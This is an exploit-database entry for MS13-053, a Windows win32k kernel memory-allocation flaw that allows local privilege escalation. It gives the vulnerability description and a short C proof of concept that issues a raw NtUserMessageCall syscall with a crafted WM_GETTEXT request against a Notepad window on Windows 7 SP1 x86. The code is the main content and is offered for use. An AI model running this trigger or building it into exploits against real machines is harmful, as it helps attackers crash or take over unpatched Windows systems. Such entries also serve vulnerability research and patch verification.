MS13-053 Win32k Memory Allocation Vulnerability

2013-09-12T00:00:00
ID 1337DAY-ID-21226
Type zdt
Reporter 0xbigban
Modified 2013-09-12T00:00:00

Description

win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability."

                                        
                                            /*
	more detials:
	https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/
	this poc is written by 0xBigBan
*/
#include <windows.h>
 
#define __NtUserMessageCall 0x11ea //on win7 sp1 x86

void SystemCall(DWORD ApiNumber, ...) {
	__asm{
		lea edx, [ebp+0x0c]
		mov eax, ApiNumber
		int 0x2e
		leave
		ret
	}
}
 
int main() {
	//you should have open a txt file with notepad
	HWND handle = FindWindow(NULL,"a.txt - notepad");
	void* ptr = malloc(sizeof(int)*2);
	
	SystemCall(__NtUserMessageCall,
				handle,
				WM_GETTEXT,
				0x8,	//buffer size
				ptr,	//user mode buffer
				0x0,
				0x2b3,
				0x2);	//ASCII boolean/flag
}

#  0day.today [2018-02-18]  #